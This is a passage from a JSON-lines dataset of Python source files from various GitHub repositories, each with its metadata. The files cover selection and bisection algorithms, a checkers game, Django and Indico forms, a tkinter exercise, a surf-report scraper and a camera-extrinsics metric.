malicious_extensions}\n","repo_name":"codecentric/metadata_picker","sub_path":"src/features/malicious_extensions.py","file_name":"malicious_extensions.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16055596459","text":"# This algorithm is a faster implementation of quick select where I use momselect to choose the median of median in an array to be the pivot_index for partition (to choose good pivot) and then do the normal quick select to find the median/kth smallest. The idea of mom select is to choose a good pivot for partition which will make quick select faster by avoiding choosing a bad pivot and spending more time finding the median.\n# Time Complexity : O(n)\n# Space Complexity : O(n), partition is not in place, creates two extra arrays. it could be done in palce though\n\ndef momselect(arr, k) :\n\n # mom select to find median of medians\n m = len(arr)//5\n remainder = len(arr) % 5\n medians = []\n \n # split array into arrays of five elements\n for i in range(m) :\n left = 5*i\n right = 5*(i+1)-1\n medians.append(medianOfFive(arr, left, right))\n if remainder > 0 :\n left = len(arr)-remainder\n right = left+remainder-1\n medians.append(medianOfFive(arr, left, right))\n\n # find good pivot (median of medians)\n mom_value = momselect(medians, len(medians)//2)\n \n # find the index of mom_value in the arr\n for i in range(len(arr)) :\n if arr[i][0] == mom_value :\n pivot_idx = i\n\n left_arr, right_arr, piv_value = partition(arr, pivot_idx)\n\n # if the k(targeted index) is on the left array, then recurse on left array\n if k < len(left_arr) : # new pivot index\n return momselect(left_arr, k)\n # if the k(targeted index) is on the right array, then recurse on right array\n elif k > len(left_arr) :\n return momselect(right_arr, k-len(left_arr)-1)\n # if the pivot_idx is equal to the targeted index, then the element we looking for is sorted\n else :\n return piv_value\n\n# Sort the array where \ndef partition(array, pivot_index):\n '''return some version of a partitioned array'''\n lesser = []\n greater = []\n piv_value = array[pivot_index][0]\n for pair in array:\n if pair[0] < piv_value:\n lesser.append(pair)\n elif pair[0] > piv_value:\n greater.append(pair)\n return lesser, greater, piv_value\n\n# find the median in n=5 array\ndef medianOfFive(arr, left_idx, right_idx) :\n new_arr = []\n for i in range(left_idx, right_idx+1):\n new_arr.append(arr[i])\n\n new_arr = sorted(new_arr)\n return new_arr[len(new_arr)//2]\n","repo_name":"NasserMughrabi/Sorting-Algorithms","sub_path":"momselect.py","file_name":"momselect.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16346398912","text":"import math\r\n# METHOD: BI-SECTION\r\n\r\nH1 = 24831 #J/mol\r\nH2 = -5118 #J/mol\r\nm0 = 0.06156 #kg/kg\r\nR = 8.314 #J/mol/K\r\nT = (52.6 + 273.15) #k\r\nC0 = 0.001645\r\nK0 = 5.710\r\nXe = 0.133 #kg/kg\r\na = 0\r\nb = 1\r\nm = 0\r\na = 0.6480666248504123\r\n\r\n\r\nC = C0*math.exp(H1/(R*T))\r\nK = K0*math.exp(H2/(R*T))\r\n\r\ns =math.pow(a,2)* math.pow(K,2)*Xe*(1-C) + a*K*(C*(Xe-m0)-(2*Xe)) + Xe\r\ny = ((C*K*a*m0)/(1-(a*K))*(1-(K*a)+(C*K*a))) -Xe\r\nprint(s)\r\nprint(y)\r\n\r\ndef fnEval(a):\r\n # Evaluate function of a, written as quadratic equation\r\n return math.pow(a,2)* math.pow(K,2)*Xe*(1-C) + a*K*(C*(Xe-m0)-(2*Xe)) + Xe\r\n\r\n#print(fnEval(0.6480666248504123))\r\nprint(\"initial values: a=0, b=1\")\r\n\r\nn= 70 # Stopping criterion (number of itertions)\r\nwhile(n>0):\r\n m = (a + b)/2 # find mid point\r\n if fnEval(a) * fnEval(m) < 0:\r\n b = m # if a solution exits set m as b\r\n print(\"At Iteration\",70-n+1,\", a=\",m)\r\n elif fnEval(b) * fnEval(m) < 0:\r\n a = m # if a solution exits set m as a\r\n print(\"At Iteration\",70-n+1,\", a=\",m)\r\n else: # if function at m evaluates to zero, the exact root has been found\r\n print(\"Root of the functiion: \", m)\r\n break\r\n n = n-1\r\n\r\ninput()\r\n","repo_name":"B-sharp-shark/Numerical-Methods","sub_path":"BisectionCode.py","file_name":"BisectionCode.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72218082007","text":"class Solution(object):\n def carFleet(self, target, position, speed):\n \"\"\"\n :type target: int\n :type position: List[int]\n :type speed: List[int]\n :rtype: int\n \"\"\"\n# 12\n# [10,8,0,5,3]\n# [2,4,1,1,3]\n\n# cars = [p, s] ==> sort the cars according to position\n# [0,1] , [3,3], [5,1], [8,4], [10,2]\n# stack = [12 , 3, 7, 1, 1] ==> (target - position) / speed\n# for each pair, append required time to stack if cur_time > stack[-1]\n# result is the len of stack\n\n cars = [ [p, s] for p, s in zip(position, speed)]\n stack = []\n cars.sort(reverse =True)\n \n for p, s in cars:\n stack.append(((target-p)/s))\n if len(stack)>=2 and stack[-1]<=stack[-2]:\n stack.pop()\n \n return len(stack)","repo_name":"CodeHana/LC","sub_path":"853-car-fleet/853-car-fleet.py","file_name":"853-car-fleet.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43100738268","text":"import datetime\nfrom django.db import models\nfrom django.db.models import Q, Count, Avg, Sum\nfrom django.db.models.functions import Lower\n\nclass PrestamoManager(models.Manager):\n ''' procedimientos para prestamo '''\n\n def libros_promedio_edades(self):\n resultado = self.filter(libro__id='1').aggregate(promedio_edad=Avg('lector__edad'),\n suma_edad=Sum('lector__edad'))\n return resultado\n #esta consulta me trae la edad promedio y suma de edades de quienes han...\n #prestado un libro con id = 1\n #primero filtro por el libro en la tabla prestamo y luego hago el calculo...\n #con las edades de las personas que lo prestaron\n\n def num_libros_prestados(self):\n resultado = self.values('libro').annotate(num_prestados = Count('libro'),\n titulo = Lower('libro__titulo'),)\n\n for r in resultado:\n print('================')\n print(r, r['num_prestados'])\n\n return resultado\n\n #esta funcion devuelve la cantidad de veces que se ha prestado un libro\n #fue necesario utilizar la funcion values porque solo con la annotate me traia\n #los libros prestados pero individualmente, repitiendo registros, no los estaba\n #sumando, con la funcion values le especifico un parametro de agrupacion unico\n #el cual es el mismo libro para que pueda entonces contar los registros\n #y los muestre agrupados, en vez de mostrar el registro individual\n\n #SI EL MANAGER NO TIENE VISTA ES PORQUE SE VALIDÓ EN EL SHELL!","repo_name":"estebancolhe/biblioteca","sub_path":"applications/lector/managers.py","file_name":"managers.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43825720166","text":"from __future__ import annotations\nimport argparse\nimport copy\nimport sys\nimport time\nfrom typing import List\n\n\ncache = {} # you can use this to implement state caching!\n\n\ndef directions(piece: str) -> list[tuple[int, int]]:\n if piece == \"b\":\n return [(1, 1), (-1, 1)]\n elif piece == 'r':\n return [(1, -1), (-1, -1)]\n else:\n return [(1, 1), (1, -1), (-1, 1), (-1, -1)]\n\n\ndef promote(board, x, y):\n if board[y][x] == 'b' and y == 7:\n board[y][x] = 'B'\n elif board[y][x] == 'r' and y == 0:\n board[y][x] = 'R'\n\n\nclass State:\n # This class is used to represent a state.\n # board : a list of lists that represents the 8*8 board\n def __init__(self, board, turn, depth):\n self.board = board\n self.turn = turn\n self.depth = depth\n\n def __repr__(self):\n s = \"\"\n for i in range(8):\n for j in range(8):\n s += self.board[i][j]\n s += \"\\n\"\n return s\n\n def __hash__(self):\n return hash(str(self.board))\n\n def __eq__(self, other):\n return self.board == other.board\n\n def next_state(self, board):\n return State(board, get_next_turn(self.turn), self.depth - 1)\n\n def single_moves(self, x, y) -> List[State]:\n moves = []\n piece = self.board[y][x]\n if piece == '.' or piece.lower() != self.turn:\n return []\n for dx, dy in directions(piece):\n new_x, new_y = x + dx, y + dy\n if new_x < 0 or new_x >= 8 or new_y < 0 or new_y >= 8:\n continue\n if self.board[new_y][new_x] == '.':\n new_board = copy.deepcopy(self.board) # TODO: get rid of this if too slow\n new_board[new_y][new_x] = new_board[y][x]\n promote(new_board, new_x, new_y)\n new_board[y][x] = '.'\n moves.append(self.next_state(new_board))\n return moves\n\n def double_moves(self, x, y) -> List[State]:\n moves = []\n piece = self.board[y][x]\n if piece == '.' or piece.lower() != self.turn:\n return []\n for dx, dy in directions(piece):\n new_x, new_y = x + 2 * dx, y + 2 * dy\n capture_x, capture_y = x + dx, y + dy\n if new_x < 0 or new_x >= 8 or new_y < 0 or new_y >= 8:\n continue\n if self.board[new_y][new_x] == '.' and self.board[capture_y][capture_x] in get_opp_char(self.turn):\n new_board = copy.deepcopy(self.board)\n new_board[new_y][new_x] = new_board[y][x]\n new_board[y][x] = '.'\n new_board[y + dy][x + dx] = '.'\n promote(new_board, new_x, new_y)\n further_jumps = State(new_board, self.turn, self.depth).double_moves(new_x, new_y)\n if further_jumps:\n moves.extend(further_jumps)\n else:\n moves.append(self.next_state(new_board))\n return moves\n\n def generate_successors(self) -> List[State]:\n moves_single = []\n moves_double = []\n for y in range(8):\n for x in range(8):\n moves_single.extend(self.single_moves(x, y))\n moves_double.extend(self.double_moves(x, y))\n return moves_double if moves_double else moves_single\n\n def is_terminal(self):\n return 0 in self.count()\n\n def count(self):\n b_pieces, r_pieces = 0, 0\n for row in self.board:\n for col in row:\n if col == 'b':\n b_pieces += 1\n elif col == 'B':\n b_pieces += 2\n elif col == 'r':\n r_pieces += 1\n elif col == 'R':\n r_pieces += 2\n return r_pieces, b_pieces\n\n def eval(self):\n return self.count()[0] - self.count()[1]\n\n\n\ndef get_opp_char(player):\n if player in ['b', 'B']:\n return ['r', 'R']\n else:\n return ['b', 'B']\n\n\ndef get_next_turn(curr_turn):\n if curr_turn == 'r':\n return 'b'\n else:\n return 'r'\n\n\ndef read_from_file(filename):\n f = open(filename)\n lines = f.readlines()\n board = [[str(x) for x in l.rstrip()] for l in lines]\n f.close()\n\n return board\n\n\n\nif __name__ == '__main__':\n # parser = argparse.ArgumentParser()\n # parser.add_argument(\n # \"--inputfile\",\n # type=str,\n # required=True,\n # help=\"The input file that contains the puzzles.\"\n # )\n # parser.add_argument(\n # \"--outputfile\",\n # type=str,\n # required=True,\n # help=\"The output file that contains the solution.\"\n # )\n # args = parser.parse_args()\n #\n # initial_board = read_from_file(args.inputfile)\n # state = State(initial_board)\n # turn = 'r'\n # ctr = 0\n #\n # sys.stdout = open(args.outputfile, 'w')\n #\n # sys.stdout = sys.__stdout__\n board = read_from_file('checkers.txt')\n state = State(board, 'r', 5)\n print(str(state))\n print(state.generate_successors())\n print(state.eval())\n\n","repo_name":"laviealon/CheckersSolver1","sub_path":"checkers_starter.py","file_name":"checkers_starter.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8790062566","text":"from PyQt4.QtGui import QGraphicsItem\nfrom PyQt4.QtGui import QPen\nfrom PyQt4.QtGui import QColor\nfrom PyQt4.QtCore import QLineF, QRectF, QPointF\nimport random\n\nclass Path(QGraphicsItem):\n\tdef __init__(self, start, end, pen = QPen(QColor(0,0,0,255))):\n\t\tself.pen = pen\n\n\t\tQGraphicsItem.__init__(self)\n\n\t\tself.starting_line = QLineF(start, end)\n\t\tself.bounds = QRectF(\n\t\t\tstart - (end - start),\n\t\t\tend + (end - start))\n\n\t\tself.steps = 4\n\t\tself.smooth = 50\n\t\tself.dampen = 100\n\t\tself.update_lines()\n\n\tdef update_lines(self):\n\t\tself.prepareGeometryChange()\n\t\tself.lines = self.generate_lines(\n\t\t\tself.starting_line,\n\t\t\tself.steps,\n\t\t\tself.smooth / 100.0,\n\t\t\tself.dampen / 100.0)\n\n\tdef generate_lines(self, line, steps = 4, smooth = 0.7, dampen = 1.0):\n\t\tif steps <= 0:\n\t\t\treturn [line]\n\t\tmid = (line.p1() + line.p2()) * 0.5\n\t\tdiff = (line.p2() - line.p1())\n\t\tnorm = QPointF(-diff.y(), diff.x())\n\t\tmid += norm * (random.random() - 0.5) * smooth\n\t\treturn self.generate_lines(\n\t\t\tQLineF(line.p1(), mid), steps - 1, smooth * dampen\n\t\t\t) + self.generate_lines(\n\t\t\tQLineF(mid, line.p2()), steps - 1, smooth * dampen)\n\n\tdef paint(self, painter, option, widget = None):\n\t\tpainter.setPen(self.pen)\n\t\tfor line in self.lines:\n\t\t\tpainter.drawLine(line)\n\n\tdef boundingRect(self):\n\t\treturn self.bounds\n","repo_name":"nmeyering/squiggly","sub_path":"path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"73342039447","text":"from wtforms.fields import BooleanField, SelectField, TextAreaField, URLField\nfrom wtforms.fields.simple import StringField\nfrom wtforms.validators import DataRequired, Optional, ValidationError\n\nfrom indico.core.config import config\nfrom indico.core.db.sqlalchemy.protection import ProtectionMode\nfrom indico.modules.events.layout import theme_settings\nfrom indico.modules.events.layout.models.menu import MenuEntry\nfrom indico.modules.events.layout.util import get_css_file_data, get_logo_data, get_plugin_conference_themes\nfrom indico.modules.users import NameFormat\nfrom indico.util.i18n import _, orig_string\nfrom indico.web.forms.base import IndicoForm\nfrom indico.web.forms.fields import EditableFileField, FileField, IndicoEnumSelectField, IndicoProtectionField\nfrom indico.web.forms.fields.principals import PrincipalListField\nfrom indico.web.forms.validators import HiddenUnless, UsedIf\nfrom indico.web.forms.widgets import ColorPickerWidget, SwitchWidget, TinyMCEWidget\n\n\nTHEMES = [('', _('No theme selected')),\n ('orange.css', _('Orange')),\n ('brown.css', _('Brown')),\n ('right_menu.css', _('Right menu'))]\n\n\ndef _get_timetable_theme_choices(event):\n it = ((tid, data['title']) for tid, data in theme_settings.get_themes_for(event.type).items())\n return sorted(it, key=lambda x: x[1].lower())\n\n\ndef _get_conference_theme_choices():\n plugin_themes = [(k, v.title) for k, v in get_plugin_conference_themes().items()]\n return THEMES + sorted(plugin_themes, key=lambda x: x[1].lower())\n\n\nclass LoggedLayoutForm(IndicoForm):\n @classmethod\n def build_field_metadata(cls, field):\n if field.short_name == 'name_format':\n return {'title': orig_string(field.label.text),\n 'default': orig_string(field.none)}\n elif field.short_name == 'theme':\n choices = {(k or None): orig_string(v) for k, v in field.choices}\n return {'title': orig_string(field.label.text),\n 'type': 'string',\n 'convert': lambda changes: [choices.get(x) for x in changes]}\n elif field.short_name == 'timetable_theme':\n choices = {(k or None): v for k, v in field.choices}\n return {'title': orig_string(field.label.text),\n 'type': 'string',\n 'convert': lambda changes: [choices.get(x) for x in changes]}\n else:\n return orig_string(field.label.text)\n\n @property\n def log_fields_metadata(self):\n return {k: self.build_field_metadata(v) for k, v in self._fields.items()}\n\n\nclass ConferenceLayoutForm(LoggedLayoutForm):\n is_searchable = BooleanField(_('Enable search'), widget=SwitchWidget(),\n description=_('Enable search within the event'))\n show_nav_bar = BooleanField(_('Show navigation bar'), widget=SwitchWidget(),\n description=_('Show the navigation bar at the top'))\n show_banner = BooleanField(_('\"Now happening\"'), widget=SwitchWidget(),\n description=_('Show a banner with the current entries from the timetable'))\n show_social_badges = BooleanField(_('Show social badges'), widget=SwitchWidget())\n name_format = IndicoEnumSelectField(_('Name format'), enum=NameFormat, none=_('Inherit from user preferences'),\n description=_('Format in which names are displayed'))\n show_vc_rooms = BooleanField(_('Show videoconferences'), widget=SwitchWidget(),\n description=_('Show videoconferences on the main conference page'))\n\n # Style\n header_text_color = StringField(_('Text color'), widget=ColorPickerWidget())\n header_background_color = StringField(_('Background color'), widget=ColorPickerWidget())\n\n # Announcement\n announcement = StringField(_('Announcement'),\n [UsedIf(lambda form, field: form.show_announcement.data)],\n description=_('Short message shown below the title'))\n show_announcement = BooleanField(_('Show announcement'), widget=SwitchWidget(),\n description=_('Show the announcement message'))\n\n # Timetable\n timetable_by_room = BooleanField(_('Group by room'), widget=SwitchWidget(),\n description=_('Group the entries of the timetable by room by default'))\n timetable_detailed = BooleanField(_('Show detailed view'), widget=SwitchWidget(),\n description=_('Show the detailed view of the timetable by default.'))\n timetable_theme = SelectField(_('Theme'), [Optional()], coerce=lambda x: x or None)\n # Themes\n use_custom_css = BooleanField(_('Use custom CSS'), widget=SwitchWidget(),\n description=_('Use a custom CSS file as a theme for the conference page. Deactivate '\n 'this option to reveal the available Indico themes.'))\n theme = SelectField(_('Theme'), [Optional(), HiddenUnless('use_custom_css', False)],\n coerce=lambda x: (x or None),\n description=_('Currently selected theme of the conference page. Click on the Preview button to '\n 'preview and select a different one.'))\n\n def __init__(self, *args, **kwargs):\n self.event = kwargs.pop('event')\n super().__init__(*args, **kwargs)\n self.timetable_theme.choices = [('', _('Default'))] + _get_timetable_theme_choices(self.event)\n self.theme.choices = _get_conference_theme_choices()\n\n def validate_use_custom_css(self, field):\n if field.data and not self.event.has_stylesheet:\n raise ValidationError(_('Cannot enable custom stylesheet unless there is one.'))\n\n\nclass LectureMeetingLayoutForm(LoggedLayoutForm):\n name_format = IndicoEnumSelectField(_('Name format'), enum=NameFormat, none=_('Inherit from user preferences'),\n description=_('Format in which names are displayed'))\n timetable_theme = SelectField(_('Timetable theme'), [DataRequired()])\n\n def __init__(self, *args, **kwargs):\n event = kwargs.pop('event')\n super().__init__(*args, **kwargs)\n self.timetable_theme.choices = _get_timetable_theme_choices(event)\n\n\nclass LogoForm(IndicoForm):\n logo = EditableFileField('Logo', accepted_file_types='image/jpeg,image/jpg,image/png,image/gif',\n add_remove_links=False, handle_flashes=True, get_metadata=get_logo_data,\n description=_(\"Logo to be displayed next to the event's title\"))\n\n\nclass CSSForm(IndicoForm):\n css_file = EditableFileField(_('Custom CSS file'), accepted_file_types='.css', add_remove_links=False,\n get_metadata=get_css_file_data, handle_flashes=True)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n url = f'{config.CONFERENCE_CSS_TEMPLATES_BASE_URL}/standard.css'\n link = f\"\"\n self.css_file.description = _('If you want to fully customize your conference page you can create your own '\n 'stylesheet and upload it. An example stylesheet can be downloaded '\n '{link}here{endlink}').format(link=link, endlink='')\n\n\nclass MenuBuiltinEntryForm(IndicoForm):\n custom_title = BooleanField(_('Custom title'), widget=SwitchWidget())\n title = StringField(_('Title'), [HiddenUnless('custom_title'), DataRequired()])\n is_enabled = BooleanField(_('Show'), widget=SwitchWidget())\n\n def __init__(self, *args, **kwargs):\n entry = kwargs.pop('entry')\n super().__init__(*args, **kwargs)\n self.custom_title.description = _(\"If you customize the title, that title is used regardless of the user's \"\n 'language preference. The default title {title} is '\n \"displayed in the user's language.\").format(title=entry.default_data.title)\n\n def post_validate(self):\n if not self.custom_title.data:\n self.title.data = None\n\n\nclass MenuUserEntryFormBase(IndicoForm):\n title = StringField(_('Title'), [DataRequired()])\n is_enabled = BooleanField(_('Show'), widget=SwitchWidget())\n new_tab = BooleanField(_('Open in a new tab'), widget=SwitchWidget())\n protection_mode = IndicoProtectionField(_('Protection mode'), protected_object=lambda form: form.protected_object)\n acl = PrincipalListField(\n _('Access control list'),\n [HiddenUnless('protection_mode', ProtectionMode.protected, preserve_data=True)],\n event=lambda form: form.event,\n allow_groups=True,\n allow_event_roles=True,\n allow_category_roles=True,\n allow_registration_forms=True,\n )\n speakers_can_access = BooleanField(\n _('Grant speakers access'),\n [HiddenUnless('protection_mode', ProtectionMode.protected, preserve_data=True)],\n widget=SwitchWidget(),\n description=_('In addition to anyone listed in the Access control list, speakers will have access.'),\n )\n\n def __init__(self, *args, event, **kwargs):\n self.event = event\n self.protected_object = kwargs.get('entry', MenuEntry(event=event))\n super().__init__(*args, **kwargs)\n\n def __iter__(self):\n # keep acl fields last when rendering the form\n return iter(sorted(super().__iter__(),\n key=lambda x: x.short_name in ('protection_mode', 'acl', 'speakers_can_access')))\n\n\nclass MenuLinkForm(MenuUserEntryFormBase):\n link_url = URLField(_('URL'), [DataRequired()])\n\n\nclass MenuPageForm(MenuUserEntryFormBase):\n html = TextAreaField(_('Content'), [DataRequired()], widget=TinyMCEWidget(images=True))\n\n def __init__(self, *args, editor_upload_url, **kwargs):\n self.editor_upload_url = editor_upload_url\n super().__init__(*args, **kwargs)\n\n\nclass AddImagesForm(IndicoForm):\n image = FileField('Image', multiple_files=True, accepted_file_types='image/jpeg,image/jpg,image/png,image/gif')\n\n\nclass CSSSelectionForm(IndicoForm):\n theme = SelectField(_('Theme'), [Optional()], coerce=lambda x: (x or None))\n\n def __init__(self, *args, **kwargs):\n event = kwargs.pop('event')\n super().__init__(*args, **kwargs)\n self.theme.choices = _get_conference_theme_choices()\n if event.has_stylesheet:\n custom = [('_custom', _('Custom CSS file ({name})').format(name=event.stylesheet_metadata['filename']))]\n self.theme.choices += custom\n","repo_name":"indico/indico","sub_path":"indico/modules/events/layout/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":10750,"program_lang":"python","lang":"en","doc_type":"code","stars":1560,"dataset":"github-code","pt":"31"} +{"seq_id":"27014349969","text":"'''\nEJERCICIO 18 Crear una aplicación de escritorio con dos cajas de\ntexto y un botón, de modo que al presionarlo se\nimprima en pantalla la suma de los dos números\ningresados en las primeras. La disposición de los\ncontroles y el tamaño de la ventana son a elección\ndel alumno.\n'''\n\nimport tkinter as tk\n\n\n###################################################\n\ndef convertir(dato):\n if dato.isdecimal():\n dato = int(dato)\n else:\n dato = \"error\"\n return dato\n\n\ndef sumar():\n # Obtenemos el texto ingresado por el usuario en cada caja\n # y lo convertimos a un entero para poder sumarlo.\n a = caja_a.get()\n a = convertir(a)\n b = caja_b.get()\n b = convertir(b)\n if a != \"error\" and b != \"error\":\n print(a + b)\n else:\n print(\"No se puede realizar\")\n\n\n###################################################\nimport tkinter as tk\n\nventana = tk.Tk()\nventana.config(width=250, height=200)\nventana.title(\"Ejemplo\")\n\ncaja_a = tk.Entry()\ncaja_a.place(x=20, y=20, width=50, height=25)\n\ncaja_b = tk.Entry()\ncaja_b.place(x=20, y=60, width=50, height=25)\n\nboton = tk.Button(text=\"Sumar\", command=sumar)\nboton.place(x=20, y=100)\n\nventana.mainloop()\n\n\n\n'''\nEJERCICIO 19 Escribir una función que sirva para multiplicar cada elemento\nde una lista numérica por un valor. Y devuelva la nueva lista con\ncada elemento en su respectiva posición, pero ya multiplicado.\n'''\ndef multiplicar(lista,valor):\n nueva = []\n for n in lista:\n resultado = n * valor\n nueva.append(resultado)\n return nueva\n\n\n############################\n\n#Valores de ejemplo\n\nnumeros = [10,5,3,20]\nm = 5\n\nprint(multiplicar(numeros,m))\n","repo_name":"matiasrepo/Phytonlearn","sub_path":"Modulo 3-4-5/ejercicio18.py","file_name":"ejercicio18.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18735654219","text":"#\n# @lc app=leetcode id=27 lang=python3\n#\n# [27] Remove Element\n#\n\n# @lc code=start\nclass Solution:\n def removeElement(self, nums: list[int], val: int) -> int:\n i = 0\n c = 0\n while i Dict[str, Any]:\n \"\"\"\n Override the base function because evaluation of the extrinsics is \"independent\" to the validation split,\n So all process isn't applied to both the dataloader and predictions, that comes from the \"validation\" split.\n\n Parameters\n ----------\n output : torch.Tensor\n Not used\n dataloaders : torch.Tensor\n Not used\n prefixes : List[str]\n Use only one keyword\n verbose : bool\n Always True\n\n Returns\n -------\n Dict[str, np.ndarray]\n Dictionary with metrics\n \"\"\"\n\n prefixes = [self.extrinsics_exe.dataset]\n\n # compute all error\n df = self.extrinsics_exe.compute(extrinsics_net_instance=self.current_extrinsics_net_instance)\n # reduced_data = List[ Dict[\"task\", nd.array(dim)] ] --> to self.print()\n reduced_data = [self.extrinsics_exe.get_statics_per_camera(prefix=self.__name, add_std=True)]\n # metrics_dict = Dict[\"task\", Any] --> to wandb logger\n metrics_dict = self.create_metrics_dict(reduced_data, prefixes) # for wandb tracking\n metrics_dict.update({\"calib_extrinsics\": wandb.Image(self.extrinsics_exe.to_figure())})\n\n if verbose:\n self.print(reduced_data, prefixes)\n\n if self.save_csv_dir != \"\":\n self.extrinsics_exe.to_csv(\n os.path.join(self.save_csv_dir, \"val_extrinsic_\" + str(self.csv_serial_num).zfill(3)) + \".csv\")\n self.csv_serial_num += 1\n pass\n\n # Refresh the current extrinsics-model\n self.current_extrinsics_net_instance = None\n return metrics_dict\n\n def evaluate(self, batch, output: Dict[str, Any], task, flipped_output) -> tuple:\n \"\"\"\n Update the current status of extrinsics; memorize as self.current_extrinsics_net_instance.\n\n Parameters\n ----------\n batch : Dict[str, Any]\n Not used\n output : Dict[str, Any]\n Register output[\"extrinsics_net\"] at the first time loop\n For this, the return of forward() implemented in the model class must have 'extrinsics_net',\n such that model.foward() return dict[\"predictions\"][\"extrinsics_net\"]\n task : str\n Not used\n flipped_output : Any (or None)\n Not used\n\n Returns\n -------\n Tuple[Dict[str, torch.Tensor]]\n The tuple of dictionary, but not used for this evaluation class here\n \"\"\"\n metrics, predictions = {}, {}\n if self.current_extrinsics_net_instance is None:\n self.current_extrinsics_net_instance = output[\"extrinsics_net\"] # Receive extrinsics_net\n else:\n pass\n return metrics, predictions # (e.g.) Dict[\"metric\": torch.tensor([b, dim_criterion])]\n","repo_name":"TRI-ML/vidar","sub_path":"vidar/metrics/extrinsics.py","file_name":"extrinsics.py","file_ext":"py","file_size_in_byte":6437,"program_lang":"python","lang":"en","doc_type":"code","stars":404,"dataset":"github-code","pt":"31"} +{"seq_id":"73416787287","text":"#fn + F5 to run the program\n\ndef fact_iter(n):\n ans = 1\n for i in range(1, n+1):\n ans *= i\n \n return ans\n\ndef fact(n):\n \n if(n == 1 or n == 0):\n return 1\n return n * fact(n-1)\n\nprint(fact(5))\nprint(fact_iter(5))","repo_name":"tdishant/NPTEL-Joy-of-Computing-Using-Python","sub_path":"Week-6/Week6_3.py","file_name":"Week6_3.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"23453373609","text":"# https://www.acmicpc.net/problem/1854\nimport sys\nfrom heapq import heappush, heappop\nfrom collections import defaultdict\n\nread = sys.stdin.readline\nn, m, k = map(int, read().split())\nINF = float(\"inf\")\nnodes = defaultdict(list)\nfor _ in range(m):\n a, b, c = map(int, read().split())\n nodes[a].append((b, c))\n\n\ndef run(start):\n dist = [[INF] * (k) for _ in range(n + 1)]\n q = []\n dist[start][0] = 0\n heappush(q, (0, start))\n while q:\n cost, node = heappop(q)\n # if dist[cnt][node] > cost:\n # continue\n for nxt_n, c in nodes[node]:\n nxt_c = cost + c\n # k번째로 작은 값과 비교\n if dist[nxt_n][k - 1] > nxt_c:\n dist[nxt_n][k - 1] = nxt_c\n heappush(q, (nxt_c, nxt_n))\n # 각 node의 거리값들을 정렬, 혹은 - 를 붙여 heap이용\n dist[nxt_n].sort()\n return dist\n\n\ndist = run(1)\nfor val in dist[1:]:\n print(val[k - 1] if val[k - 1] != INF else -1)\n","repo_name":"yeoV/Algorithm","sub_path":"백준/다익스트라/1854.k번째최단경로.py","file_name":"1854.k번째최단경로.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11707303006","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport pandas as pd\nfrom datetime import datetime\n\nclass scrapper_class:\n def __init__(self, departement, heure):\n self.departement = departement.lower()\n self.heure = heure\n self.fichier_lat_long_par_spot = pd.read_csv('lat_long_spots.csv', index_col=False)\n\n def scrapper_function(self):\n response = requests.get(\"https://www.surf-sentinel.com/spots-de-surf/france/liste-spots-de-surf-\" + self.departement)\n soup = BeautifulSoup(response.content, \"html.parser\")\n\n communes = []\n spots = []\n\n for i in soup.find_all(\"div\", class_=\"location-content\") :\n url = str(i.find(\"div\").find(\"a\"))\n commune_avec_slash = str(re.search(self.departement + \"/[\\w-]+\", url).group(0)).replace(self.departement,'')\n spot_url = str(re.search(self.departement + \"/[\\w-]+/[\\w-]+\", url).group(0)).replace(commune_avec_slash,'').replace(self.departement,'').replace(\"/\",\"\")\n commune_url = commune_avec_slash.replace('/','')\n\n communes.append(commune_url)\n\n if spot_url == '' :\n spots.append(commune_url)\n else :\n spots.append(spot_url)\n\n spots_main_data = pd.DataFrame()\n spots_main_data['commune'] = communes\n spots_main_data['spot'] = spots\n spots_main_data['full_name'] = spots_main_data['commune'] + ' ' + spots_main_data['spot']\n spots_main_data['url'] = 'https://www.surf-sentinel.com/surf-report/france/' + self.departement + '/' + spots_main_data['commune'] + '/' + spots_main_data['spot']\n\n url = []\n date = []\n heure = []\n qualité_des_vagues = []\n conditions = []\n level = []\n hauteur = []\n note = []\n\n for spot_url in spots_main_data['url'] :\n meteo_spot_web_page = requests.get(spot_url)\n soup_url = BeautifulSoup(meteo_spot_web_page.content, \"html.parser\")\n\n for i in soup_url.find_all(\"div\", class_=\"detailed-report-box hidden gocenter\") :\n date_url = str(re.search(\"box-\\d+-\\d+-\\d+-\\d+\", str(i)).group(0)).replace('box-','')\n url.append(spot_url)\n date.append(date_url[0:10])\n heure.append(date_url[11:].replace('0',''))\n\n qualité_des_vagues_desc = str(re.search(\"strong>\\w','').replace('\\d','').replace('= len(maps) or c < 0 or c >= len(maps[0]) or (r, c) in visited or maps[r][c] == 'X':\n return 0\n if (r, c) not in visited:\n visited.add((r, c))\n return int(maps[r][c]) + dfs(r+1, c) + dfs(r-1, c) + dfs(r, c+1) + dfs(r, c-1) \n \n for row in range(len(maps)):\n for col in range(len(maps[0])):\n if maps[row][col] != 'X' and (row, col) not in visited:\n answer.append(dfs(row, col))\n \n return sorted(answer) if answer else 